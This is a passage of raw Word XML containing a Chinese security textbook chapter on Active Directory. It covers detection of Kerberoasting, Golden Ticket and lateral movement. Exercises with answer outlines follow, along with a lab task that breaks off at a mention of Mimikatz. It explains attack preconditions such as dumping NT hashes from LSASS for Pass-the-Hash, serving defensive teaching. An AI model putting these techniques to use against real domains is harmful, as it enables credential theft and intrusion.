        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寿命超过域策略设置），以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段不合理。重点关注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户密码最近未更改而票据中加密类型不符的情况。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoasting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控短时间内大量请求不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求（事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4769），特别是来自同一未特权用户的请求，且密钥加密类型为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RC4（表明可能试图获取易于破解的票据）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动工具使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Sysmon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1（进程创建）中检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PsExec（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PSEXESVC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务安装）、WMI（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wmiprvse.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加载可疑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DLL）、WinRM（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wsmprovhost.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动）等工具的非预期使用；结合远程目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分析横向移动模式。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SIEM/UEBA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">创建基线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：建立用户正常登录的时间、源主机、特权使用模式，偏离基线的行为（如财务部员工在凌晨登录，或普通用户突然对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行远程注册表操作）触发告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框总结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：纵深防御从网络分段（防止任意主机互通）、身份保护（Protected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Users、Credential </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Guard）、目录加固（限制票证类型、定期换密钥）到持续监控（异常票据请求、异常远程执行），共同破坏攻击者“获取一个凭据即可全域通行”的依赖条件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题与迁移任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题（提取题）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">票据流程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：请简述用户从登录域到访问文件共享资源过程中，Kerberos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议的三个交换阶段涉及哪些主要消息和密钥。为什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需要使用自己的密钥加密</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TGT？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动依赖什么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Pass-the-Hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击能够成功的前提是什么？它侵犯了域环境的哪个基本安全假设？请从凭据存储和身份验证协议两个角度回答。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">如何检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：假设你是某企业的安全分析师，域控制器日志中出现来自同一源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的大量事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4769，且请求的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MSSQLSvc/db1.domain.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，请求用户的身份为普通市场部员工。你检测到后续该源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">又向一台未部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的服务器发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">远程登录（事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4624，NTLM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证）。请推断可能发生的攻击行为，并列出你会检查的额外日志和应对措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题：回忆</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AS-REQ/AS-REP、TGS-REQ/TGS-REP、AP-REQ/AP-REP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三对消息；思考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的作用相当于临时身份证，防止每次服务请求都要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证用户密码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题：考虑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单点登录如何缓存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，NTLM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证如何接受</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而非密码，以及域内主机间默认允许</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题：事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4769 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">高频率对特定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoasting；后续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录可能表明攻击者已破解该服务账户密码，正尝试横向移动。检查破解成功的证据（如该服务账户在其他主机上的登录成功事件），并立即重置该服务账户密码，检查该账户的委派配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答概要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. AS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段：用户提供身份，KDC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TGT（含用户信息和会话密钥）；TGS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段：用户用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和认证符向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求特定服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ST；CS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段：用户向服务出示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和认证符，服务完成认证。KDC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自加密</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是为了让</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自身可在之后验证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而无需存储会话状态，且防止客户端篡改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内容。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前提：攻击者已拥有本地管理员权限，能从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hash；目标系统开放远程管理端口且未完全限制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证；目标账户具有远程登录权限。侵犯的假设：密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应只能由用户本人使用，而非任何获取到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的人；内部网络应视为安全区域而非默认信任区域。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">推断：很可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberoasting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击后服务账户被破解，攻击者尝试用该账户横移。额外检查：查看该服务账户在目标服务器上是否有成功登录（事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4624），调查破解工具痕迹（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberoast </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志）。应对措施：立即隔离可疑主机，禁用该服务账户，强制重置密码，检查该账户在域内的权限痕迹和委派关系，并将事件升级为安全事件响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务（概念层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在你的隔离</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验室中，尝试以下概念验证（不进行恶意操作）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以域用户身份登录后，打开命令提示符，执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">klist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">观察当前缓存的票据。然后使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">klist purge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">清除票据，尝试访问一个网络共享，观察重新获取票据过程。记录认证流程与理论是否吻合。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在域控上开启安全日志审计（默认开启），然后模拟一次正常登录，观察事件查看器中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4768、4769 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">事件的结构，注意源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、用户名、票证加密类型字段。思考异常检测的基准应如何采集。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（可选，仅限授权环境）使用授权工具如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mimikatz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看</w:t>
      </w:r>
      <w:r>
